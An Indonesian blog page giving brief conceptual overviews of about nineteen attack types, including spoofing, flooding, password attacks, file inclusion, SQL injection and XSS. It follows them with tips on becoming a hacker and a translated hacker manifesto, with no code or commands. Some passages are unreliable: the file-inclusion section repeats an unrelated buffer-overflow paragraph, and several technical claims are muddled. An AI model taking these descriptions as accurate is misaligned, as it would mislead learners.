IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C. IP Spoofing terjadi ketika seorang attacker ‘mengakali’ packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker.
2. FTP AttackSalah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang. Tidak pernah atau jarang mengupdate versi server dan mempatchnya adalah kesalahan yang sering dilakukan oleh seorang admin dan inilah yang membuat server FTP menjadi rawan untuk dimasuki. Sebagai contoh adalah FTP server yang populer di keluarga UNIX yaitu WU-FTPD yang selalu di upgrade dua kali dalam sehari untuk memperbaiki kondisi yang mengizinkan terjadinya bufferoverflow Mengexploitasi FTP juga berguna untuk mengetahui password yang terdapat dalam sistem, FTP Bounce attack (menggunakan server ftp orang lain untuk melakukan serangan), dan mengetahui atau mensniff informasi yang berada dalam sistem.
3. Unix Finger ExploitsPada masa awal internet, Unix OS finger utility digunakan secara efficient untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact. Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha cracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar ‘memberitahu’ password dan kode akses terhadap system.
4. Flooding & BroadcastingSeorang attacker bisa menguarangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service(Dos), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Ketika permintaan flood ini dikirim ke semua station yang berada dalam network serangan ini dinamakn broadcasting. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang menyediakan informasi menjadi lemah dan akhirnya menyerah. Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan.
5. Fragmented Packet AttacksData-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama( kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memroses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah(fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol.
6. E-mail ExploitsPeng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function).
7. DNS and BIND VulnerabilitiesBerita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).
8. Password AttacksPassword merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing.
9.Proxy Server AttacksSalah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam sistem saya akan bisa juga saya lakukan dalam system anda dan sebaliknya.
10. Remote Command Processing AttacksTrusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.
11. Remote File System AttackProtocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file.
12. Selective Program InsertionsSelective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor.
13. Port ScanningMelalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.
14.TCP/IP Sequence Stealing, Passive Port Listening and PacketInterception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like.
15. HTTPD AttacksKerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.
HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.
16. Remote File Inclusion (RFI)HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.
Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna. Dengan RFI seorang attacker dapat menginclude kan file yang berada di luar server yang bersangkutan.
17. Local File Inclusion (LFI)Metode yang memanfaatkan kelemahan script PHP include(), include_once(), require(), require_once() yang variabel nya tidak dideklarasikan dengan sempurna. Dengan LFI seorang attacker dapat menginclude kan file yang berada di dalam server yang bersangkutan.
18. SQL injection
SQL injection adalah teknik yang memanfaatkan kesalahan penulisan query SQL pada suatu website sehingga seorang hacker bisa menginsert beberapa SQL statement ke ‘query’ dengan cara memanipulasi data input ke aplikasi tersebut. sql injection merupakan teknik lawas namun paling banyak digunakan oleh para dedemit maya.
19. Cross Site Scripting (XSS)
XSS dikenal juga dengan CSS adalah singkatan dari Cross Site Scripting. XSS adalah suatu metode memasukan code atau script HTML kedalam suatu website yang dijalankan melalui browser di client.
Sumber : http://stylermania.blogspot.com/
langkah-langkah menjadi seorang hacker
Hacker adalah pakar keamanan yang memang memliki kemampuan dalam menembus jaringan-jaringan. Tetapi tidak bertujuan untuk merusak jaringan tersebut, malahan tujuannya mulia. Menemukan bug-bug dan melaporkannya kepada Administrasi Jaringan. Tetapi entah kenapa stigma maayarakat selalu menjurus kepada hal yang merusak kalau mendengar istilah Hacker. Oke, akan saya berikan beberapa langkah untuk menjadi Hacker (Real Hacker), yaitu diantaranya:
- Memiliki Pengetahuan tentang Jaringan Komputer
- Ini sangatlah penting karena proses Hacking tidak melulu di komputer anda sendiri. Pastilah proses hacking harus di-aplikasikan kedalam jaringan. Ilmu ini menjadi sangat penting juga karena seorang Hacker biasanya akan mencari-cari celah dimana suatu jaringan dapat ditembus, dan menemukan kesalahannya. Jadi istilahnya kalian harus hapal jalan ke Jakarta bila ingin naek motor kesana.
- Menguasai beberapa Bahasa Pemrograman
- Ini juga penting banget neh…. seorang Hacker dituntut untuk bisa membuat aplikasi versi dia sendiri, yang nantinya aplikasi tersebut bisa menjadi tools untuk proses hacking. Mulai lah dari belajar C++ untuk yang sederhana, dilanjutkan dengan VB, MySQL, PHP. dan juga script-script HTML.
- Mencari Informasi
- Hacker juga harus dituntut selalu Up to date dalam informasi, terutama dalam hal Computer Security. Kunjungi situs-situs yang menyediakan informasi tentang kemanan dan pemrograman, karena pasti akan berguna, dan jangan lupa untuk selalu sillaturahmi kepada mbah google
- Aktif mengikuti forum
- Kalau yang satu ini dibilang musti ya engga, taopi kalo dibilang ga usah ya musti. Jad ya… keputusan ada di tangan anda. Karena dengan aktif mengikuti suatu forum yang ada hubungannya dengan hacking,komputer,jaringan. Kita bisa bertukar wawasan dengan anggota forum yang laen. dan biasanya didalam forum tersebut terdapat beberapa atau bahkan banyak orang yang telah memiliki keahlian hacking dan pemrograman yang tinggi. pokoknya “jangan Malu bertanya”, karena didalam forum pasti akan dijawab.
- Bisa berbahasa Inggris
- Komputer berasal dari Eropa, kalau komputer dan beberapa bahasa pemrograman dari Jawa, kita ndak usah susah-susah belajar bahasa inggris. Tapi karena kmputer tidak berasal dari jawa, kita harus mnguasai bahasa inggris, karena bebrapa bahasa pemrograman kebanyakan menggunakan bahasa Universal tersebut untuk syntx-nya. dan juga informasi dari situs luar yang tentunya berbahasa inggris cenderung lebih update daripada situs lokal.
Hanya itu saja langkah-langkah menjadi hacker, seterusnya ya terserah anda mau gunakan dimana… SALAM HACKER
Manifesto Seorang Hacker
"Ini adalah dunia kami sekarang, dunianya electron dan switch, keindahan sebuah baud. Kami mendayagunakan sebuah system yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal. Kami menjelajah, dan kalian sebut kami kriminal. Kami mengejar pengetahuan, dan kalian sebut kami kriminal. Kami hadir tanpa perbedaan warna kulit, kebangsaan ataupun prasangka keagamaan, dan kalian sebut kami kriminal. Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, kalian berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal. Ya, aku memang seorang kriminal. Kejahatanku adalah rasa keingintahuanku. Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka. Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak akan kalian maafkan. Aku memang seorang hacker, dan inilah manifesto saya. Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua. Bagaimanapun juga,
kami semua senasib seperjuangan."
. .
kami semua senasib seperjuangan."
. .
Langganan:
Postingan (Atom)